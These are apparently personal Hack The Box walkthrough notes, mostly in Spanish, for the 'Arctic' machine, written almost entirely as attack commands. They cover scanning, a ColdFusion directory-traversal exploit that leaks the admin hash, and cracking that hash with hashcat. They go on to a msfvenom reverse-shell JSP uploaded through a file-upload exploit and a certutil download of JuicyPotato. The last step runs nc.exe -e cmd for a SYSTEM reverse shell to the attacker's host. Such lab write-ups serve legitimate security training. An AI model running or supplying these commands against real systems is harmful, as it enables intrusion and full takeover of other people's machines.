echo "10.129.151.59 arctic.htb" | sudo tee -a /etc/hosts
nmap -A -p- -oA output 10.129.151.59 --min-rate=10000 --script=vuln --script-timeout=15 -v
nmap -sC -sV -O -p- -oA arctic 10.129.151.59
nmap -sU -O -p- -oA arctic-udp 10.129.151.59
nikto -h 10.129.151.59:80
gobuster dir -k -u http://10.129.151.59/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
Podemos ver que en el login tiene Adobe Coldfusion Buscamos si existe un exploit
searchsploit -m multiple/remote/14641.py
python2 14641.py arctic.htb 8500 "../../../../../../../../ColdFusion8/lib/password.properties"
Usamos 100 porque sha1 es 100
.\hashcat64.exe -m 100 -a 0 .\hash.txt .\SecLists-master\Passwords\rockyou.txt
Hashcat dice que la contrasena es: happyday
En el formulario parece quese hace un cambio al texto con javascript
Despues de hacerlo como 10x Lo que tenia que hacer era usar burp suite y foxy proxy
Hacer esto lo mas rapido posible en 30 segundos
cambiar lo que dice en cfadminPassword y poner lo que te sale en la consola despues de correr lo siguiente en la consola de js
console.log(hex_hmac_sha1(document.loginform.salt.value, '2F635F6D20E3FDE0C53075A84B68FB07DCEC9B03'));
Ir al formulario y poner happyday como contrasena
Vamos a system settings y mappings
Tomamos cuenta que el directorio es C:\ColdFusion8\wwwroot\CFIDE
Despues nos dirigimos a Debugging & Logging -> Scheduled Task
Trate de usar este script pero no me funciono: https://raw.githubusercontent.com/fuzzdb-project/fuzzdb/master/web-backdoors/cfm/cfExec.cfm
msfvenom -p java/jsp_shell_reverse_tcp LHOST=tun0 LPORT=5555 > arctic_shell.jsp
Bajar el codigo en esta pagina: https://forum.hackthebox.eu/discussion/116/python-coldfusion-8-0-1-arbitrary-file-upload
Y crear un archivo con ese codigo
python2 arb-file-exploit.py 10.129.151.59 8500 shell.jsp
rlwrap nc -lvnp 5555
Nos dirigimos a: http://10.129.151.59:8500/userfiles/file/exploit.jsp
Le damos click a save output to a file
Encontramos arctic_shell2.jsp en el index de CFIDE
nc -lvnp 443
Nos vamos con juicy potato cuando vemos SeImpersonatePrivilege
https://github.com/ohpe/juicy-potato/releases/tag/v0.1
certutil.exe -f -urlcache -split http://10.10.xx.xx/JuicyPotato.exe JuicyPotato.exe
python3 -m http.server 80
Hacemos un directorio en windows\temp
Tuve que agregar unos caracteres mas en la contrasena.
Para validar el usuario:
net user
JuicyPotato.exe -t * -l 1337 -p C:\Windows\System32\cmd.exe -a "/c \\10.10.xx.xx\smbFolder\nc.exe -e cmd 10.10.xx.xx 443"
nc -lvnp 443